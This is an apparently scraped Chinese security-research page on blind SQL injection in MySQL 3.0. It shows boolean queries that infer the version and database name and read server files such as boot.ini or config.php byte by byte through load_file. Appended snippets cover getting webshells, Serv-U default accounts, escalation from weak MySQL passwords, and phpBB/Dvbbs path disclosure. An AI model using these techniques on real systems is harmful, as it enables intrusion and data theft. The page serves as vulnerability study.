关于mysql 3.0的注射的一点思路_漏洞研究

mysql 3.0的注射  

对mysql的注射主要是靠union 的联合查询,但union只对版本4。0以上的有用,对3。0以下的就没用了。。。。。。。。。。  

所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file  

但是也不可以直接使用union替换出来。 下面就是我的一点思路:  

得到版本:  

mysql> select * from user where userid=1 and length(version())<10;  

Empty set (0.00 sec)  

mysql> select * from user where userid=1 and length(version())<1777;  

+--------+----------+----------+  

| userid | username | password |  

+--------+----------+----------+  

| 1 | angel | mypass |  

+--------+----------+----------+  

1 row in set (0.00 sec)  

得到当前数据库:  

mysql> select * from user where userid=1 and length(database())>0;  

+--------+----------+----------+  

| userid | username | password |  

+--------+----------+----------+  

| 1 | angel | mypass |  

+--------+----------+----------+  

1 row in set (0.00 sec)  

暴取文件代码:  

mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))<1;  

Empty set (0.05 sec)  

mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))>1;  

+--------+----------+----------+  

| userid | username | password |  

+--------+----------+----------+  

| 1 | angel | mypass |  

+--------+----------+----------+  

1 row in set (0.00 sec)  

因为工作量大,可以用程序来实现(不过也很麻烦)  

另外思路: 可以先使用字符处理函数得到"特殊字符的位置",如我们暴的是config.php文件我们就可以选取"localhost"(或其他)为特殊字符,先得到所在的位置(在哪个字节),在去猜它附近的,这样可以省去不少工作量。  

时间: 2024-11-25 13:28:35

关于mysql 3.0的注射的一点思路_漏洞研究的相关文章

从后台到webshell的一点思路_漏洞研究

 主要是利用后台对access数据库的"备份数据库"或"恢复数据库"功能,"备份的数据库路径"等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用.具体方法和分析可以参考angel的文章<动网论坛7.0获得WebShell的分析>.据我所知,目前还有很多的asp程序后台存在这样的漏洞,利用方法大同小异.    php+mysql程序  

对Serv-U 6.0.0.2默认帐户及密码的一点理解_漏洞研究

今天获得一个webshell.发现了serv-u目录.看了下ServUDaemon.ini  [GLOBAL]  Version=6.0.0.2  OpenFilesDownloadMode=Exclusive  PacketTimeOut=300  LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39  6.0.0.2版的.曾经看到哪说6.0版的默认本地管理帐号和密码依旧是原来那个.可又好像听谁说过6版的密码已经改了..  呵.这里发现.多

由mysql弱口令取得system权限的实战_漏洞研究

由mysql弱口令取得windows的system权限的实战   今年五月mix在幻影论坛公布了一篇关于mysql入侵的文章(<<Windows环境下通过MySQL以SYSTEM身份   执行系统命令>>,连接地址='http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006' target=_blank>http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006),反

UPDATE注射(mysql+php)的两个模式_漏洞研究

UPDATE注射(mysql+php)的两个模式                               文/安全天使·SuperHei 2005.8.11  一.测试环境:  OS: Windowsxp sp2  php: php 4.3.10 (  mysql 4.1.9  apache 1.3.33   二.测试数据库结构:  -----start---  -- 数据库: `test`  --   -- -----------------------------------------

手工注射php学习_漏洞研究

代码:  $conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname);  $password = md5($password);  $q = "select id,group_id from $user_table where username='$username' and password='$password'";  $res = sql_query($q,$conn);  $row = sql_fetch_row($res); 

phpBB 2.0.13惊现漏洞的解决_漏洞研究

一.Path Disclosure  漏洞文件/db/oracle.php 漏洞描叙直接访问oracle.php导致暴露web路径 涉及版本phpbb <=2.013 测试ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误 Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\oracle.php on line 405 解决办法 如果你不是采用的oracle数

PHP博客程序C-blog2.0漏洞测试大揭密(图)_漏洞研究

c-blog2.1测试手记 朋友买了空间支持php但是没有mysql数据库,说是这空间商主要是支持asp脚本的.哎 难道就不能玩php了吗?  嘿嘿 可以用php+access的php程序啊.百度了下发现了c-blog这个程序,它有个php+access版本的.down下了看看,就有了这次测试的结果. 1.暴出物理路径 在看了这个blog后,发现他写的到上没什么太大的bug,文件比较少而且简结. 它的说明上看到了如下: ./include   包含常用类库 编辑器 配置文件 -->/config

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞_漏洞研究

漏洞发现:LiNZI[B.C.T]@www.cnbct.org  厂商名字:动网先锋论谈  厂商地址:http://www.dvbbs.net/  漏洞程序:Dvbbs 7.1.0  漏洞描述:  Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等.  漏洞利用例子:  一.泄露绝对漏洞测试:  对官方的测试站点:bbs.dvbbs.net  上传一张图,代码如下:  GIF89a  <script>alert(document.c

手工注射JSP学习_漏洞研究

1. 判断注入类型(数字型还是字符型)  字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)  http://www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)  http://www.test.net/index_kaoyan_view.jsp?id=117 And user<char(0)  http://www.test.net/index_kaoyan_view.jsp?id=117' A